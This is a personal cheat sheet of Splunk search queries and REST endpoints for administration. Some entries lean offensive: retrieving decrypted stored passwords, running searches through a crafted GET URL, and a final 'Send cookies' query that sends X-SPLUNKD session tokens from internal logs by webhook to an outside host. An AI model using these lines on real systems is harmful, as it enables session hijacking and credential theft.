Splunk Notes

URI Path for web application

If you want to look at the information associated with a specific uri path for a web application:

sitetolookat.com sourcetype=<the sourcetype you have for web stuff> url="/uri/path/file.php*"

Add image to dashboard

     <h1>HTML Panel Example</h1>
     <p>The HTML panel displays inline HTML.</p>
       <img src="picture.jpg"/>


View internal splunk logs

index=_internal source="*.log"


tail -f functionality

After running a query, be sure to change the Presets for real-time to a window, such as a 5 minute window to show all events that match the input criteria in the past 5 minutes.

View entry for specific log file

This particular one will show all events for the splunk web service.


Show decrypted passwords for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/passwords

Note that you need to have the list_storage_passwords capability assigned to the user that would access these. To see what capabilities are associated with a given user, navigate to https://<splunk instance ip or hostname>:8000/en-US/manager/<app name>/auth/view_capabilities?roles=<username>

Resource: https://www.hurricanelabs.com/splunk-tutorials/make-splunk-do-it-how-to-decrypt-passwords-encrypted-by-splunk


Show collections for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/collections/config


Access data in a collection for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/collections/data/<collection>


Check status of the service

Navigate to https://<splunk instance ip or hostname>:8089/services/kvstore/status


Delete a data in a collection by id

DELETE /servicesNS/nobody/<app name>/storage/collections/data/<collection>/<_key listed>


Write/read to/from a csv file

This particular query will create a file, current_user.csv, with the current user's username:

| rest /services/authentication/current-context/context | table username | outputcsv current_user.csv

The csv file can be found in:
<splunk install loc>/var/run/splunk/csv/current_user.csv

This will read the contents of that file:

|inputcsv current_user.csv

Via GET request

https://<splunk instance ip or hostname>:8000/en-US/splunkd/__raw/services/search/jobs/oneshot?output_mode=json&search=|%20rest%20/services/authentication/current-context/context%20|%20table%20username%20|%20outputcsv%20foo

Get list of indexes

| eventcount summarize=false index=* | dedup index | fields index

Resource: https://answers.splunk.com/answers/39370/is-it-possibl-to-get-a-list-of-available-indices.html

Clear data from an index

  1. Stop the splunk process:
splunk stop
  1. Clear data from a specific index:
splunk clean eventdata -index <index name>
  1. Restart splunk:
splunk start

Resource: https://answers.splunk.com/answers/46401/how-to-delete-old-date-from-splunk.html

Dump example

This is a risky command will export search results to a set of chunk files on the local disk in the form of basefilename_number_anothernumber.raw.gz.

| history | dump basefilename=ExportedFilesSoExciting

To find the files on disk, use this command:

find . -iname "*raw.gz"

Resources: https://docs.splunk.com/Documentation/Splunk/8.0.1/SearchReference/Dump

Official Quick Reference Guide

This guide lays out the fundamentals needed to use Splunk effectively.

Send webhook

| sendalert webhook param.url=https://google.com/bla.js

Send cookies

index=_internal source=*web_service.log X-SPLUNKD: | sendalert webhook param.url=http://yoursite.com